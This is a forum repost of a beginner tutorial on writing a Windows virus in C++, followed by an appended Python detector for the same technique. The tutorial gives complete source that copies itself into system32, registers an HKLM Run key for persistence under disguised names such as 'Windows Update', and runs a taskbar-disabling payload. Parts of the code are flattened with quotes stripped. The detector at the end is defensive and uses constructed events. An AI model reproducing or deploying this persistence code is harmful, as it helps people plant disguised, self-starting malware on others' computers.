
First: This is not my guide; I found it while surfing the internet (probably some guy named Smith) and copy-pasted it. Also I just posted it here coz I think it's a great beginner tut for writing viruses in C++ (and I mean writing virus, not learning C++). Second: viruss means virus only, just a fun way to write, so plz do not tell me I got the spelling wrong.

Win32 API Reference <- Not required but very helpful
A C++ Compiler

I recommend DEV for people who do not wish to buy and Microsoft Visual C++ 6.0 for people with money and serious programmers, however DEV works fine.

Even if you have never programmed before you should be able to carry along with this one, but it helps if you know a little bit of C++.

Ok, let's begin. Fire up DEV (or Microsoft Visual C++) and select new Win32 GUI for DEV users and Win32 for MSVC. Now with DEV it makes some generated code for GUI apps; delete it all, leaving something like this:

QUOTE
#include <windows.h>

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil)
{
    return 0;
}

Now compile and run the code; nothing should happen (if a black window pops up it means you didn't go to Win32). The reason nothing happened is because our program doesn't do anything. It runs and exits. We need to make it do something; first of all add this code to the project in between the { } and before return 0;.

MessageBox(NULL,"Hello","Messagebox Example",MB_OK);

Now compile and run the program again. A message box should pop up, cool ay? But it's not much of a virus; let's make it do some cool stuff.
Add the following code to your project: QUOTE char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); GetSystemDirectory(system,sizeof(system)); strcat(system,\\virus.exe); CopyFile(pathtofile,system,false); MessageBox(NULL,Hello,Messagebox Example,MB_OK); Once again make sure the code is before return 0; and the { }.Ok compile and run the code, now open up the system32 directory in you windows folder (for those w ho dont know goto run in the startbar and type: %windir%\system32 Ok look for a file called virus.exe in the system32 folder. Dont believe me that

it's our virus? Run the file; it should come up with a message box saying Hello. Cool, is it not? Ok, time to explain how this works:

char system[MAX_PATH]; This is the buffer to hold the system32 directory.

char pathtofile[MAX_PATH]; This is the buffer to hold the path to our virus.

HMODULE GetModH = GetModuleHandle(NULL); This one may be hard to grasp for some but bear with me. GetModH holds the handle to our virus; GetModuleHandle() gets the handle and stores it there.

GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); This gets the FileName of our virus using the handle we got before and storing the path to it in pathtofile.

GetSystemDirectory(system,sizeof(system)); Basically this finds out what your system directory is. Remember not everyone's Windows directory is c:\windows\system32. Mine is d:\winnt\system32 on this box; the reason for this is we want to copy to an existent system32 directory.

strcat(system,"\\virus.exe"); Ok, we have the system32 directory c:\windows\system32 or whatever; now we need a place to copy to. This function binds two strings together to form one. So our system buffer now says: c:\windows\system32\virus.exe or whatever the case may be. Note \\ is not a typo; \\ is how C++ interprets \. A single \ is seen by C++ as an escape character and if you have one your virus will not work!

CopyFile(pathtofile,system,false); Pretty self-explanatory: copy from where our virus is to where we want it to be. What false means: if virus.exe already exists it will copy over it; to stop this change false to true (leave it as false for this tutorial).

Ok, that's it. Next we are going to add code so it will startup when the computer boots. We are going to use 3 API calls to accomplish this:

RegOpenKeyEx(); This opens the key we want to write to
RegSetValueEx(); This sets our value
RegCloseKey(); This closes the key

Time to add code to our fledgling virus: QUOTE HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,Software\\Microsoft\\Windows\\CurrentVersion\?\Ru n,0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, Writing to the Registry Example,0,REG_SZ,(const unsigned char* )system,sizeof(system)); RegCloseKey(hKey); Ok obviously this is going to need an more of an explanation than before. HKEY h Key is the buffer that holds the data for calls to the registry nothing else abo ut this except you need it. RegOpenKeyEx Opens the key HKEY_LOCAL_MACHINE\Softwa re\Microsoft\Windows\CurrentVersion\Run this is the key for starting up for all users which is what we want. 0 is reserved and needs to stay 0. We want to open up the key with set permissions thats why we use KEY_SET_VALUE. And then we add t he buffer. The next call: hKey is the buffer Writing to the registry example is the message t

o appear in the key you can change this to something less obviously like Windows Update or Norton Security Shield anyway be creative. The next zero is the same as a bove reserved needs to stay 0. REG_SZ is the type of key we want. There are othe r types like REG_BINARY and REG_DWORD but we are using REG_SZ which is for text. (const unsigned char*) formats our string to a const unsigned char * because it doesnt accept normal chars. system is the buffer that holds the path to our viru s and the final part is the size of the string, this is calculated automatically by using sizeof. The next call closes the registry key. Ok add this to you code so it looks something like: QUOTE #include <windows.h> int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil) { char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); GetSystemDirectory(system,sizeof(system)); strcat(system,\\virus.exe); CopyFile(pathtofile,system,false); HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,Software\\Microsoft\\Windows\\CurrentVersion\?\Ru n,0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, Writing to the Registry Example,0,REG_SZ,(const unsigned char* )system,sizeof(system)); RegCloseKey(hKey); return 0; } Now run you code and open up regedit and browse to HKEY_LOCAL_MACHINE\Software\M icrosoft\Windows\CurrentVersion\Run there should be a new key in the area to the right our key! Now comes the fun part of writing a virus the payload! This could be anywhere fr om a DdoS to making the cursor jump around the screen. Note destructive payloads are lame and frowned upon by the virus community, so do you self a favour and g et the idea of destroying computers out of your mind. Besides writing a non dest ructive payload is more fun. Lets go with a payload Ive written and christened Th e Flasher. 
Your code should now look like this with the payload attached: QUOTE #include <windows.h>

int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil) { char system[MAX_PATH]; char pathtofile[MAX_PATH]; HMODULE GetModH = GetModuleHandle(NULL); GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile)); GetSystemDirectory(system,sizeof(system)); strcat(system,\\virus.exe); CopyFile(pathtofile,system,false); HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE,Software\\Microsoft\\Windows\\CurrentVersion\?\Ru n,0,KEY_SET_VALUE,&hKey ); RegSetValueEx(hKey, Writing to the Registry Example,0,REG_SZ,(const unsigned char* )system,sizeof(system)); RegCloseKey(hKey); HWND hWin; hWin = FindWindow(Shell_TrayWnd,NULL); EnableWindow(hWin,false); while(1==1) { ShowWindow(hWin,false); Sleep(1000); ShowWindow(hWin,true); Sleep(1000); } return 0; } Although small dont underestimate this payload it is very annoying try it. To fix your startbar ctrl-alt-delete find virus.exe end the process. Then find explore r.exe end it. Finally while still in task manager goto file run and type explorer .exe without the quotes. If that doesnt work change EnableWindow and ShowWindow to true instead of false, remember to change it back later though. Comments are still welcome, if u have any problem lemme know even though its not my code i ll be more than happy to explain things to you. -------------------------------------------------------------------------------:evilgrin: There are three types of people in the world:
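
A defender-side view of the behaviour the post describes, as an added example that is not part of the original post or guide: it correlates an executable created in the system directory with a Run value that points at the same file. The event dictionaries are constructed and only loosely modelled on Sysmon event IDs 11 (file create) and 13 (registry value set); `find_self_install` and its output fields are assumptions for illustration.

```python
import re

# The guide notes the system directory varies (c:\windows\system32, d:\winnt\system32).
SYSTEM_EXE = re.compile(r"^[a-z]:\\[^\\]+\\system32\\[^\\]+\.exe$", re.I)
RUN_VALUE = re.compile(
    r"^(HKLM|HKU\\[^\\]+)\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\(?P<name>.+)$",
    re.I)

def find_self_install(events):
    """Flag Run values whose data is an .exe recently dropped into system32."""
    dropped = {}    # lower-cased dropped path -> image that created it
    findings = []
    for ev in events:
        if ev["EventID"] == 11:      # file created
            target = ev["TargetFilename"]
            # Ignore files written by binaries that already live in system32.
            if SYSTEM_EXE.match(target) and not SYSTEM_EXE.match(ev["Image"]):
                dropped[target.lower()] = ev["Image"]
        elif ev["EventID"] == 13:    # registry value set
            m = RUN_VALUE.match(ev["TargetObject"])
            data = ev["Details"].strip().strip('"').lower()
            if m and data in dropped:
                findings.append({
                    "value_name": m.group("name"),
                    "target": ev["Details"],
                    "dropped_by": dropped[data],
                    "same_process": dropped[data].lower() == ev["Image"].lower(),
                })
    return findings

# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"EventID": 11, "Image": r"C:\Users\lab\Desktop\sample.exe",
     "TargetFilename": r"D:\WINNT\system32\virus.exe"},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorTray",
     "Details": r'"C:\Program Files\Vendor\tray.exe"'},
    {"EventID": 13, "Image": r"C:\Users\lab\Desktop\sample.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Writing to the Registry Example",
     "Details": r"D:\WINNT\system32\virus.exe"},
]

if __name__ == "__main__":
    for finding in find_self_install(SAMPLE_EVENTS):
        print(finding)
```

On real telemetry the value data may carry arguments or environment variables, so the path comparison would need normalising first.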
